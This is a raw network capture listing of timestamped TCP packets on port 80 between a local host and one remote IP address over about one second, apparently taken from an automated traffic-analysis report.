                                                                                                        Dec 23, 2024 08:39:46.997767925 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.997867107 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.998330116 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.998799086 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.998925924 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.999849081 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.999905109 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.999978065 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.000247002 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.000901937 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.000938892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.001092911 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.001859903 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.001955032 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.002060890 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.002933979 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.003072977 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.003618956 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.004002094 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.004015923 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.004065037 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.004949093 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.005100012 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.005337954 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.006068945 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.006216049 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.006270885 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.007045031 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.007108927 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.007181883 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.008157015 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.008271933 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.009110928 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.009192944 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.009227991 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.009984970 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.010276079 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.010289907 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.010334969 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.011151075 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.011246920 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.011291027 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.012258053 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.012384892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.012432098 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.013334990 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.013417959 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.013586044 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.014406919 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.014460087 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.014508963 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.015430927 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.015470028 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.015532970 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.016480923 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.016519070 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.016617060 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.017438889 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.017530918 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.017577887 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.018426895 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.018537998 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.018583059 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.019598007 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.019649982 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.020262957 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.020575047 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.020617008 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.020776033 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.021621943 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.021635056 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.021694899 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.022537947 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.022672892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.022751093 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.023621082 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.023694038 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.023828030 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.024627924 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.024765968 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.025182009 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.025715113 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.025765896 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.025813103 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.026763916 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.026884079 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.027010918 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.027760029 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.027885914 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.028007984 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.028821945 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.028876066 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.028925896 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.029866934 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.029937983 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.030050993 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.030879021 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.030961037 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.031141996 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.032020092 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.032151937 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.032202959 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.032927036 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.033065081 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.033730984 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.033927917 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.103636026 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.166276932 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.166357994 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.166485071 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.166731119 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.166783094 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.167015076 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.167714119 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.168157101 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.168174982 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.168215990 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.169121981 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.169183969 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.169198990 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.170226097 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.170357943 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.170399904 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.171201944 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.171257019 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.171329021 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.172218084 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.172300100 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.172342062 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.173274040 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.173321009 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.173362970 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.174263954 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.174396992 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.174446106 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.175292969 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.175363064 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.175407887 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.181943893 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.182023048 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.182054043 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.182468891 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.182612896 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.182897091 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.183505058 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.183549881 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.183631897 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.184550047 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.184597015 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.184637070 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.185556889 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.185626984 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.185652971 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.186642885 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.186738014 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.186739922 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.187691927 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.187743902 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.187783957 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.188683987 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.188826084 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.189064980 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.189719915 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.189824104 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.189831972 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.190804005 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.190867901 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.190879107 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.191781998 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.191889048 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.191916943 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.192833900 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.192905903 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.192955017 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.193974972 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.194034100 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.194075108 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.194910049 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.195009947 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.195039988 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.196010113 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.196058989 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.196095943 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.197005987 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.197098970 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.197146893 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.198046923 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.198096037 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.198105097 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.199037075 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.199086905 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.199280977 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.200120926 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.200167894 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.200198889 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.201183081 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.201210022 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.201384068 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.202189922 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.202308893 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.202361107 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.203228951 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.203330040 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.203336954 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.204293966 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.204339027 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.204369068 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.205285072 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.205408096 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.205456018 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.206383944 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.206401110 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.206448078 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.207366943 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.207384109 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.207515001 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.208399057 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.208494902 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.208554029 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.209496975 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.209548950 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.209589958 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.210439920 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.210551023 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.210603952 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.211477041 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.211579084 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.211632967 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.212513924 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.212625980 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.212631941 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.213579893 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.213637114 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.213648081 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.214564085 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.214620113 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.214751959 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.215636969 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.215688944 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.215791941 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.216706038 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.216784000 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.216814041 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.217721939 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.217834949 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.217885017 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.218770027 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.218827963 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.218895912 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.219795942 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.219844103 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.219903946 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.220829964 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.220922947 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.220979929 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.221836090 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.221889019 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.221932888 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.222910881 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.222970963 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.223031998 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.223903894 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.223965883 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.224036932 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.225073099 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.225106955 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.225123882 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.225996017 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.226176023 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.358306885 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.358409882 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.358488083 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.358870983 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.358927011 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.359050989 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.359868050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.360018015 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.360075951 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.360852003 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.360971928 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.361021042 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.361917973 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.362010002 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.362090111 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.362935066 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.362988949 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.363991976 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.364051104 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.364101887 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.364159107 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.365036011 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.365134954 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.365204096 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.366107941 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.366198063 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.366250038 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.367096901 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.367140055 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.367429018 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.374123096 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.374207020 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.374260902 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.374644995 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.374747038 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.374789000 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.375684977 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.375787973 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.375843048 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.376692057 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.376816988 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.376866102 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.377836943 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.377904892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.377954960 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.378797054 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.378926039 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.379059076 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.379872084 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.379921913 CET8049800139.99.188.124192.168.2.6
